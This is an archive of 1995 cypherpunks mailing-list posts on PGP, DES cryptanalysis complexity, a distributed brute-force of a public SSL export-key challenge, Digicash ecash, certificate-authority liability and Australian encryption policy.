INTERNET THIEVES

Trade in black-market data is a growing problem for business.  What, if
anything, can be done?

By Clinton Wilder and Bob Violino (Issue date: August 28, 1995)

The new frontier of cyberspace represents vast opportunities for
innovation, entrepreneurship, and profit-making. But there is also a
dark side to the online world, one that poses a worrisome threat to the
security of corporations.  The Internet has spawned an illegal market
in which thieves use the latest Net software tools to trade stolen
information, including corporate trade secrets.
[...]
===============================================================================


--
Martin Janzen           janzen@idacom.hp.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ferreira, Ben  296-4158" <BFERREIR@pchardy.petro-canada.ca>
Date: Wed, 23 Aug 95 12:15:03 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: PGP for elm
Message-ID: <303B8EF5@smtpgw.pccw.petro-canada.ca>
MIME-Version: 1.0
Content-Type: text/plain




Anyone know if there is a PGP interface or elm version that supports PGP?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org  (Dan Bailey)
Date: Wed, 23 Aug 95 09:17:45 PDT
To: solman@mit.edu
Subject: Re: DES & RC4-48 Challenges
Message-ID: <199508231617.AA25787@ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 22 Aug 1995 00:43:20 EDT you wrote:

>The forms of differential cryptanalysis that I'm aware of require The
>cracker to adaptively atack the encrypting or decrypting device. I
>therefore do not believe that they are especially applicable to
>financial transactions schemes, most of which change keys quite
>frequently.
>
>JWS

According to Biham and Shamir's Differential Cryptanalysis of DES, "An
interesting feature of the new attack is that it can be applied with
the same complexity and success probability even if the key is
frequently changed and thus the collected ciphertexts are derived from
many different keys.  The attack can be carried out incrementally, and
one of the keys can be computed in real time while it is still valid. 
this is particularly important in attacks on bank authentication
schemes, in which the opponent needs only one opportunity to forge a
multi-million dollar wire transfer, but has to act quickly before the
next key changeover invalidates his message.  This is the first
published attack which is capable of breaking the full DES in less
than the complexity of the exhuastive search of 2^55 keys." (7-8)
	The problem with this attack, of course, is generation and analysis
of all the required chosen plaintexts.  The analysis phase eats up
2^37 time looking at 2^36 ciphertexts from a universal set of 2^47
chosen plaintexts.  Brute-forcing SSL has a worst-case time complexity
on the order of 2^40.  It appears that complexity for breaking
16-round DES is on the order of 2^37, according to Biham and Shamir.
(87)
	Is there any published source code available for this type of attack?
 The book itself doesn't contain any code, just lots of proofs.  Since
2^40 > 2^37, I think a group effort would be capable of mounting this
attack.
						Dan

******************************************************************************
"I think, therefore I am" - Descartes                            Dan Bailey
"I don't think, therefore I'm a moustache." - Sartre		    dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
******************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Wed, 23 Aug 95 11:20:04 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: A glance at the future of missing child identification
In-Reply-To: <199508210136.VAA09171@bb.hks.net>
Message-ID: <9508231819.AA19515@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green writes
>BTW, is there a futures market that allows you to bet real money?

If you mean something like Idea Futures, but with real money, I haven't
seen one.  I *have* seen "Iowa Electronic Markets", run by U Iowa, which
has real-money futures on certain political campaigns (Presidential,
Republican Convention, and Powell Nomination).

See <URL:http://www.biz.uiowa.edu/iem/index.html>.

I e-mailed the person responsible asking about the legalities of doing
such a thing, as true gambling on presidential elections isn't legal.
She indicated that they had a letter from the appropriate governmental
agency which promised to take no action as long as they adhered to
certain limits (a maximum on purchases being the most significant).

Apparently they've already had requests to make some fairly *large*
($500,000 or more) investments.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Wed, 23 Aug 95 11:28:52 PDT
To: cypherpunks@toad.com
Subject: Government Accountability through Cryptography
Message-ID: <199508231828.NAA02667@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Recently, there have been many scandals (Ruby Ridge, Whitewater, the death of
Vince Foster, Waco) involving the government.  Even if the government is
completely innocent, the perception of corruption is damaging.  A big part of
the problem comes from claims that incriminating documents have been hidden,
destroyed, or altered.  I believe I have a solution.  If the government would
just encrypt (using 64 bit keys or less) all their internal documents and
publish them electronically, they could be checked when questions arise.  The
key should be held in escrow by a private company to be released only by court
order, executive order, or act of Congress.  Since this is very similar to
the administration's proposal on cryptography, I'm sure they won't object.
Perhaps we should lobby Congress.


Frank Stuart              | (Admiral Grace) Hopper's Law:
fstuart@vetmed.auburn.edu | It's easier to get forgiveness than permission. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 23 Aug 95 10:31:55 PDT
To: cypherpunks@toad.com
Subject: Re: e$: The Book-Entry/Certificate Distinction
Message-ID: <v02120d01ac610fa3b88c@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:06 PM 8/23/95, Timothy C. May wrote:

>Whoah, there!
>
>I wasn't saying we were "quibbling" about definitions, I was saying that
>different people have different names for things and different
>interpretations, and that it behooves us to figure out what the real
>definitions are, the standard names, and not invent new names when existing
>names will do.

Agreed. My apologies for characterizing it as "quibbling". Chain-gun
Hettinga here, type first, and let God sort 'em out. A meta-reference to
the problem I was talking about, I suppose. And, given what Perry said
later, it's not so much a fight over definitions as I thought.

>And that one benefit of class libraries for the "things" of commerce,
>finance, crypto, etc., may be make it clearer what is being described.

Amen.

Tim, just what does "aptical" mean? ;-).

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 23 Aug 95 10:32:12 PDT
To: Nathan Loofbourrow <cypherpunks@toad.com
Subject: Re: The End of the Ecash Trial?
Message-ID: <v02120d04ac6112134b53@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:35 PM 8/23/95, Nathan Loofbourrow wrote:
>I have yet to see a date, but Digicash states several times in their
>press releases that Cyberbucks are only a trial currency, and that at
>some point in the future the trial will come to an end.

We've talked about this a little bit on ecm.

Someone from Digicash is on record there as saying that trading in c$ came
as a complete surprise.

The hitch about continuing to honor c$ is that there needs to be a bank.
Someone correct me if I'm wrong, but it seems that the current system does
work on an offline, peer-to-peer basis.  Nonetheless, ocassionally, you
still need to verify that the money hasn't been double spent, and for that
you need a bank.

The problem with being a bank is the price of the bank software, which is
where David Chaum and Co. want make their money.  Thus, the last price I
got (offhand) from David on the phone a year ago was $250k + 10% of net
profits.  Given the cost of hardware, people, lawyers, and if you actually
back the certificates with dollars in a bank of deposit (not being what we
want do to here, admittedly) bankers, and more lawyers.  Could add up to a
mulitmillion dollar proposition.

Of course, it could be done with donated professional time, bandwidth,
hardware and donated bank software from Digicash. But it's hard to see that
happening from here...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@obscura.com>
Date: Wed, 23 Aug 95 13:35:03 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: is there...
In-Reply-To: <199508231956.PAA10953@frankenstein.piermont.com>
Message-ID: <Pine.3.89.9508231334.A608-0100000@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain


There is a link to the list from my home page. I don't remember the URL
for the list, but my page is http://obscura.com/~loki/Welcome.html

	-Lance

On Wed, 23 Aug 1995, Perry E. Metzger wrote:

> 
> Is there an online version of Raph's anonymous remailer list for FTP
> or on the web? I suddenly need to give it to someone.
> 
> .pm
> 

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Tue, 22 Aug 95 20:35:07 PDT
To: cypherpunks@toad.com
Subject: Re: Export policy change
In-Reply-To: <9508182218.AA04527@ch1d157nwk>
Message-ID: <Pine.SUN.3.91.950823133224.647N-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Heck, you Americans need to store your keys in a foreign country; I have 
a floppy-based CP/M box that looks ideal for the job (I have LOTS of 
those 5-1/4" DSDD floppies).

Did I mention that my drives are a bit unreliable?  And my son likes to 
pull floppies apart?

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2DAA.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | D8 15 71 F9 26 C8 63 40  5E 63 5C 65 FC A0 22 99





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Wed, 23 Aug 95 11:11:12 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Personal: Flub
In-Reply-To: <ac60acd12d0210047191@[205.199.118.202]>
Message-ID: <199508231810.OAA03332@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> >Henry,
> >
> >I just saw your name and wondered if you're any relation to Dan Farkas, a
> >mathematician (last I heard) who attended the same university I did in the
> >late 1960s.
> 
> Sorry abou this!
> 
> I hit the "Cancel" button as soon as the transfer started, and had hoped
> I'd caught it before it went out to the list.

  You should have pressed the escape key. ;-)


____
 ||





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Henry W. Farkas" <hfarkas@ims.advantis.com>
Date: Wed, 23 Aug 95 11:31:26 PDT
To: cypherpunks@toad.com
Subject: Re: Personal: Flub
In-Reply-To: <199508231810.OAA03332@clark.net>
Message-ID: <Pine.3.85.9508231403.B50593-0100000@pangloss.ims.advantis.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 23 Aug 1995, Ray Cromwell wrote:

> > I hit the "Cancel" button as soon as the transfer started, and had hoped
> > I'd caught it before it went out to the list.
> 
>   You should have pressed the escape key. ;-)

186,000 miles per second.  It's not just a good idea, it's the law.

(I tried to resist, folks, really I did, but Ray had to go and make his 
[escape] joke, so it's actually his fault. ;-)

===========================================================================
     Henry W. Farkas      |      Me?    Speak for IBM?    Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------  
   hfarkas@vnet.ibm.com   |     http://newstand.ims.advantis.com/henry
      henry@nhcc.com      |          http://www.nhcc.com/~henry 
---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
---------------------------------------------------------------------------
Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not
  fast, but it's not bad, and we're cheaper than the guy down the street!"
===========================================================================








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Wed, 23 Aug 95 11:39:19 PDT
To: cypherpunks@toad.com (Cypherpunks List)
Subject: Re: Certificates/Anonymity/Policy/True Names
Message-ID: <9508231839.AA15687@wombat.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


[ Oops -- this was supposed to go to the list too. ]

Michael Froomkin writes:

[ Note: I've rearranged a couple of paragraphs ]

> On Mon, 21 Aug 1995, Bill Stewart wrote:
> 
> > can be substantial even if the suit is bogus.)  Under what conditions do
> > you expect somebody to sue a CA?
> 
> CA certifies key saying that holder has corporate power to enter into 
> deals upto $1million.  Keyholder commits fraud, arguably outside 
> corparate powers.

> CA certifies that a document is authentic and time-stamps it.  Lawyers 
> did not do due dilligence, books were cooked, everyone who touches 
> document gets sued.

This seems to be confusing different entities.  The roles in these
examples aren't the CA's role.  In the usual crypto lingo, the CA
only certifies that a key belongs to a certain individual.  Some
entity within the corporation is responsible for saying whether an
individual can do deals up to $1 million.  Some other organization
provides time-stamps (though it's possible that a CA could be dragged
into your second example).  But let's keep the terminology straight:
a CA as used in crypto literature means the agent who certifies that
"this key belongs to X" (for some definition of X).


> CA certifies you are Jack Ripper based on phony id.  In fact you are Sam 
> Spade.  CA sued for recovery of ensuing fraud.
> 
> In each of these cases, if the CA did exactly what it promises and no 
> more, it (arguably) deserves a way to short-circuit the suit, thus 
> keeping its costs down.

This is a better example to start from.  I agree with your sentiment
but don't necessarily agree with the conclusion.  Let's start from
the important "if" in your sentence.  If the CA publicly guarantees
only that it checks for a certain ID and can prove it did this
(perhaps by producing a picture or photocopy of the ID it examined),
it shouldn't have too much trouble defending the case.  No reason why
it should need any special short-circuit.  Eventually, successful
defenses will show that it's a waste of time to attack the CA if
the CA did what it promised.

If it guarantees more (say, that "this key *really* belongs to 'X'"),
then it better be prepared to establish that fact to its own
satisfaction before issuing the certificate (via birth certificates,
passports, fingerprints, retinal scans or all of the above).  If it
fails to do those things, then it is and should be liable.  After
all, that's what the CA is getting paid for: to keep the promise
it's implicitly making and take the heat to back up its promise.


> Since (in the absence of any rules given the newness of the technology) it
> is very likely that a rich CA would get nuisance suits every time a deal
> in which it particiapted went sour, the absence of rules will either 
> raise costs CAs have to charge (e.g. to buy insurance) or will keep rich 
> folk out of the industry (which isn't good either, since you want CAs to 
> buy security and to last).  Thus the need for clear liability rules.

I think this is just part of the landscape for a CA.  Again, that's
what they're getting paid for.  As for the rules, the courts will work
those out through litigation.  How else?  :-)

BTW, VeriSign is acting as a CA now for Netscape Commerce Server and
Open Market Secure Web Server certificates, and perhaps others -- see:
http://www.verisign.com/

I don't know exactly what guarantee VeriSign's making or what they
expect their liability to be, but they are making a reasonable effort
to establish the identity of server certificate holders (copy of letters
of incorporation, business licenses and so forth).  And they are charging
$290 for a first-year certificate.  It seems to me this $290 (though 
not huge for a business) is a lot more than it costs them just to
check the papers and execute the mechanics of creating the certificate.
The rest is their compensation for taking the "risk" of issuing the
certificate's implicit guarantee.  Presumably, some of that money goes
toward insuring themselves against the kinds of claims you cited above.

Just my thoughts -- IANAL.


-- Jeff



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Tue, 22 Aug 95 21:39:35 PDT
To: cypherpunks@toad.com
Subject: Re: Third World Man
In-Reply-To: <9508211648.AA17528@toad.com>
Message-ID: <Pine.SUN.3.91.950823143446.647P-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 21 Aug 1995, Peter Trei wrote:

> First world: Western (and Westernized) nations
> Second world: Communist bloc
> Third world: The rest, mostly poor nations. 

That's pretty much how I learned it in school, back in the 60s.  Mind
you, "third world" wasn't an insult then.

I also heard another version: 1st world was Europe/Asia (cuz they were
there first), 2nd world was America (they got discovered later), and 3rd
was everybody else.

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2DAA.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | D8 15 71 F9 26 C8 63 40  5E 63 5C 65 FC A0 22 99





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 23 Aug 95 11:55:33 PDT
To: cypherpunks@toad.com
Subject: Digital cash project? Re: The End of the Ecash Trial?
In-Reply-To: <199508231635.MAA07961@mummy.cis.ohio-state.edu>
Message-ID: <9508231854.AA22322@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>The only way to preserve the market would appear to be providing an
>ecash-for-ecash exchange with a new bank, presumably a licensee of the
>Digicash software. Such a bank could, out of little more than good
>will and a desire to kick-start a new e-currency, offer to exchange c$
>for the new ecash. Or, perhaps we just shrug our shoulders, kiss our
>hardly-earned Cyberbuck goodbye, and mumble about how it was fun while
>it lasted.

Well I might be interested in setting up such a scheme, but I'm not sure
that the Chaumian Annonymity guarantees could be provided as is. This is 
because of Chaum's patent on blind signatures.

There are schemes which offer weaker annonymity and also schemes which provide 
for faster movement of currency.

The scheme I am currently looking at employs both symmetric and asymmetric 
keying to provide for fast transfers of cash after a connection is set up. The 
mode of payment is of the fraction of cents per page type so RSA is too 
expensive.

Who would be interested in such a trial? Who would be interested in writing 
code? There are complications if the Web consortium is involved since we are 
obliged to provide code to our members one month in advance of the official 
release. But that is for source I beleive, I don't think that there would be a 
problem with trial users or with exchanging code with collaborators. After the 
one month period all consortium code becomes copyright but freely avaliable for 
use for any purpose, its the X consortium contract in fact.


Cyberbucks could be siphoned out of the Chaum system by simply agreeing to 
exchange e-cash for whatever the new currency is. It would also be possible to 
go in the other direction perhaps, "I promise to pay the bearer on demand the 
sum of one cyberbuck".

Since most cyberbuck users are looking to control access to a resource its not 
clear that the cyberbuck model is what is needed. It might be possible to deploy 
a resource contention arbitration mechanism which was not convertible. This 
would also avoid many of the regulatory problems of e-cash.


		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 23 Aug 95 12:02:24 PDT
To: cypherpunks@toad.com
Subject: Re: SSL Challenge - problem with NT client?
Message-ID: <9508231902.AA26831@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


(I think we need a separate code cracking list)

I've got the NT client up and running. It can connect to the server, and
download the challenges and I can request and select  keyspace. 

But I can't seem to ungray the 'search' button, so I can't test it.

Any ideas?




Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: denning (Dorothy Denning)
Date: Wed, 23 Aug 95 15:13:05 EDT
To: banisar@washofc.epic.org
Subject: Australia and Encryption Policy
Message-ID: <bacb2926ddb79fa0101a724d73d55268@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


Ross Anderson posted a message on the net recently stating that
Australia was proposing an encryption policy that would force residents
to use weak cryptography while banks would get key escrow.  His source
was a talk by Steve Orlowski, who is Assistant Director, Security
Management, in the Australian Attorney-General's Department.

Attached is a copy of an open letter by Mr. Orlowski in response to
that post.  He is not proposing that individuals be forced to use weak
encryption.  Key escrow would be an option available to anyone wanting
a high level of encryption.  Organizations and individuals could escrow
their own keys if desired.

This message and his letter may be forwarded.

Dorothy Denning
---------------

Dear

Thank you for your comments on the subject of the use of encryption by
private individuals.

Firstly I would like to make the point that the debate has arisen from
one person's interpretation of a paper I gave at a conference on
"Cryptography Policies and Algorithms"  The full text of that paper is
now available on the net at

	http://commerce.anu.edu.au/comm/staff/RogerC/RogersHome.html

The paper carries a disclaimer at the top that the views are mine and
do not necessarily represent the views of the Australian Government.
The paper sets out the Government's policy on telecommunications
interception, which includes the issue of the use of cryptography as:
"As a result of the Report, Australia is, among other TI issues,
monitoring the impact of encryption in the telecommunications
interception area and will re-examine matters in 1997 following the
opening of the telecommunications area to full competition."
Telecommunications covers both voice and data communications.

The last paragraph of the paper says that there is a need to expand the
cryptography debate to cover the needs of individual users in the
context of the information superhighway rather than current Internet
users.  The paper also points out that issues suh as cost, convenience
and public confidence in cryptography systems will be the main issues.
Public confidence is explained in terms that as long as it meets the
general requirement for privacy it will be acceptable.  I still
maintain that the general user of the superhighway in the next century
will be satisfied with a lower level of encryption which will meet that
and cost and user friendliness requirements.

On specific point made in the Internet message, the paper does not
suggest, either directly or by implication, that individuals should be
banned from using encryption.

Regarding the use of higher level encryption, the paper supports the
concept of commercial key escrow where organisations hold their own
keys but may be required to provide them in response to a court order.
The same would apply to individuals who could either hold there own keys
or store them with a commercial body.  Access to those keys would be by
court order and in that respect is no different to existing procedures
for the interception or seizure of telephone conversations or paper
records.  There is no suggestion that these basic principles, and
protection of individual's rights in general, should be changed

If individuals were to use lower level encryption there would be no
need for them to maintain copies of any keys for such systems.  To my
mind this is preferable to a requirement for keys to be maintained for
all encryption systems, which could be the result if universal key
escrow were introduced.

Finally on the question of interception, the general public expects a
reasonable level of law enforcement to ensure the protection of their
person and property.  Governments are required to find a balance
between this and the rights of individuals to privacy.  Part of this
balance is to ensure that law enforcement authorities convince a court
that there is a need to carry out an interception.  There is no
suggestion that this fundamental approach should be changed.  The paper
certainly does not suggest tha the Attorney-General's Department should
become a centralised interception authority.  In fact such a role would
not be consistent with its role as a source of advice to Government.

I hope the above clarifies both the Government's policy and my personal
views on these matters.

I consider this to be an open letter and have no objection to it being
used as such.

Yours sincerely

Steve Orlowski



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Wed, 23 Aug 95 07:17:57 PDT
To: ecm@ai.mit.edu
Subject: Subject: ANNOUNCE: 2nd SSL challenge - we need your compute!
Message-ID: <6253.9508231416@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


[a copy of final announce, start time 18:00 GMT, tomorrow (Thu), as
posted to a list of USENET groups]

This is a request for idle compute time for the brute force of Hal's
second SSL challenge.

You will likely have read about the brute force crack of a netscape
SSL session by Damien Doligez <Damien.Doligez@inria.fr>, which was
widely covered in the media, and much discussed in this (and other)
newsgroups.

Damien has information on his breaking of the 1st challenge at:

	http://pauillac.inria.fr/~doligez/ssl/

Hal Finney <hfinney@shell.portal.com> has now issued a 2nd challenge,
the aim with this challenge is to demonstrate in how short a time an
export SSL key can be broken.  ie not how soon, but how *quickly* from
start to finish (note the distinction), so for this reason we are
constructing a virtual start line, and the virtual start gun will fire
at:

	Thu Aug 24 at 18:00 GMT

If you are interested to join in, please obtain the sources / binaries
for your system in preparation for the start.  (Even if you are after
the start, join in as it will take a while).

Piete Brooks <pb@cl.cam.ac.uk> wrote and is hosting the socket server,
and WWW pages, see this URL for the socket client and brute forcing
software, and WWW forms interface key doler:

	http://www.brute.cl.cam.ac.uk/brute/

ftp archive (software available by both WWW and ftp):

	ftp://ftp.brute.cl.cam.ac.uk/pub/brute/


Prize fund - donate c$ for the prize
======================================================================

I have set up a prize fund in c$ (digicash ecash) to add a bit of fun
to the proceedings, and stimulate interest in DigiCash (the best ecash
on the planet IMO).

The prize fund at time of writing is c$ 292.30, and the winner will be
the person who hits the key.  The person who gets the prize will be
encouraged to participate in the ecash market to cash the money in, to
increase cash flow (there is currently a shortage of c$ sellers), and
to avoid taking the cash out of circluation.

Give your c$ donations for the prize fund here:

	http://dcs.ex.ac.uk/~aba/sslprize.html

(or via email: shop-id: SSL-prize-fund, account-id: aba@dcs.ex.ac.uk)

The (unofficial) digicash exchange:

	http://www.c2.org/~mark/ecash/ecash.html

Sign up for the Digicash trial (get c$ 100 free on opening account):

	http://www.digicash.com/ecash/

A couple of things to note, the ecash exchange is not affiliated with
digicash, it is an experiment setup by digicash enthousiasts to allow
a floating exchange mechanism for buying and selling c$.  The other
thing to note is that exchange rate is currently (from the exchange
above) about 100 c$ = 5 US $.


Compiling for some platforms required
======================================================================

We are currently lacking a DOS only version of the BRUTESSL.EXE, this
is complicated by the fact that Andrew Roos <AndrewR@vironix.co.za>
has 32 bit 80x86 assembly speedups as well as a generic C version in
his brutessl application which makes it tricky to get a 32 bit
application.  (Oh for standard flat 32 bit UNIX).  Apparently it is
possible using the Pharlap DOS extender software, so if anyone is able
to help with this, please contact Piete or myself (Adam).

Also (an easier task!) could someone compile a 16 bit one, which we
can use to fall back on if the above doesn't work.  I did this myself,
but my PC HD has probs of it's own at the moment, all you have to do
is edit search.c brutessl.h brutessl.c lightly to fix up the macro for
rotate left (makes a difference if your compiler supports it), and to
make sure that the typedef (I think in brutessl.h) is set up so that
word = a long.  Don't use the assembly.c but rather the generic C
version search.c, that'll make things easier.

Any platforms you would like to see pre-compiled binaries for, send
them along, the source code is available from the ftp, and http
addresses above.  A MAC binary would be nice also.


More technical things... skip unless you're interested
======================================================================

The socket server which will be doling out the keys is running on:

	sksp.brute.cl.cam.ac.uk:19957

but you shouldn't need to know that unless you like to know what's
going on the client software is wired to use this by default.

There is an draft RFC like specification for the SMTP like protocol
which the client and server use to talk to each other (SKSP = Simple
Key Searching Protocol):

	http://www.brute.cl.cam.ac.uk/ftp/pub/brute/protocol.txt


Who's doing what (who to complain to about things not working :-)
======================================================================

Hal Finney	Issued challenge 1 and 2
Piete Brooks	hosting www, and socket server, author of unix socket code
Andrew Roos	wrote brutessl app
Andy Brown	wrote windows NT client & protocol spec with Piete
Adam Back	general software questions, prize fund ecash shop

Damien Doligez	Broke 1st challenge
Eric Young	\ independently broke 1st challenge also
David Byers	/

Mark Grant	WWW Ecash exchange

email / www for those poeple:

Hal Finney <hfinney@shell.portal.com> 	  http://www.portal.com/~hfinney/
Andy Brown <a.brown@nexor.co.uk>
Piete Brooks <pb@cl.cam.ac.uk> 		  http://www.cl.cam.ac.uk/users/pb/
Adam Back <aba@dcs.ex.ac.uk> 		  http://dcs.ex.ac.uk/~aba/
Andrew Roos <AndrewR@vironix.co.za>
Damien Doligez <Damien.Doligez@inria.fr>  http://pauillac.inria.fr/~doligez/
Eric Young <eay@mincom.oz.au>
David Byers <davby@ida.liu.se>
Mark Grant <Mark.Grant@insignia.co.uk>	  http://www.c2.org/~mark/

(also lots of other people have offered compute time, and / or
contributed technical advice / bug reports etc)


Adam Back <aba@dcs.ex.ac.uk>
Piete Brooks <pb@cl.cam.ac.uk>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMDs4MCnIuJ1VakpnAQEG7gQAhQck5IoTQ9/jLcsD903u7yTRKssLJqxx
Fxk2MpEWkPfIchD7cD7F4ZgO1gs+q6/rMxzEfS5YUZAb9Z4nCF1EUr2Qf2O5sIWV
fFNjVJMCt4clGOQoG1KdJ9Om93JxIGQl2ep7OLc0RdCUFd8wRWC3yPC+2Tl8069m
gHRtAJ0My3U=
=LWFM
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Wed, 23 Aug 95 00:23:41 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: The sorry state of non-US crypto
In-Reply-To: <199508230536.BAA02012@bb.hks.net>
Message-ID: <Pine.LNX.3.91.950823151630.14787E-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 23 Aug 1995, Lucky Green wrote:

> I just spent an hour surfing the various crypto/cypherpunks web sites. In
> this hour I did not come across a single non-US site that carried anything
> else but PGP. Most non-US sites just carry rants about the evil ITAR, and
> a few carry the various international versions of PGP. That's it. I know
> that there are several European ftp sites that have other cryptographic
> software as well, but I sure as hell can't find them by browsing the web.

Try these URL's:

Italy:   ftp://ftp.dsi.unimi.it/pub/security/crypt/
UK:      ftp://ftp.ox.ac.uk/pub/crypto/
Croatia: http://pgp.rasip.fer.hr/
Germany: ftp://ftp.darmstadt.gmd.de/pub/crypto/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Wed, 23 Aug 95 13:53:04 PDT
To: nobody@flame.alias.net (Anonymous)
Subject: Re: Out of state gambling
In-Reply-To: <199508171002.MAA01952@utopia.hacktic.nl>
Message-ID: <9508232052.AA14383@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous writes
>Could someone, perhaps a furriner, perhaps talk to the folks
>at casino.org and see if they would be willing to open a book on
>presidential election outcomes.  Or perhaps organize something with
>an enterprising London/Moscow gambling house, preferably with fast
>IP feed, and constantly updated odds on the web.

None of this is necessary.  The University of Iowa's Business School
already has this sort of thing.  They run a real-money futures market
which currently has the following three markets:

1996 Presidential Election
1996 Republican Convention Nomination
1996 Colin Powell Nomination

The URL is <URL:http://www.biz.uiowa.edu/iem/index.html>

Just as an aside, the Republicans have been steadily losing ground
over the last three months.  The difference between the Republican
coupon and the Clinton reelection coupon is about 1/2 cent, down
from 10 cents or so a few months ago.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Wed, 23 Aug 95 12:52:45 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Australia and Encryption Policy (fwd)
Message-ID: <Pine.PMDF.3.91.950823155055.623131195H-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Don't know quite how I became a Denning <--> cypherpunks conduit, but 
there you are; anyway this time she is passing on Orlowski's response to 
Ross Anderson.  I have no part in this debate, honest.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki

---------- Forwarded message ----------
Date: Wed, 23 Aug 1995 15:29:17 -0400 (EDT) 
From: Dorothy Denning <denning@cs.cosc.georgetown.edu>
To: MFROOMKI@umiami.ir.miami.edu
Cc: denning@cs.cosc.georgetown.edu
Subject: Australia and Encryption Policy 


----- Begin Included Message -----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 23 Aug 95 12:57:14 PDT
To: cypherpunks@toad.com
Subject: is there...
Message-ID: <199508231956.PAA10953@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



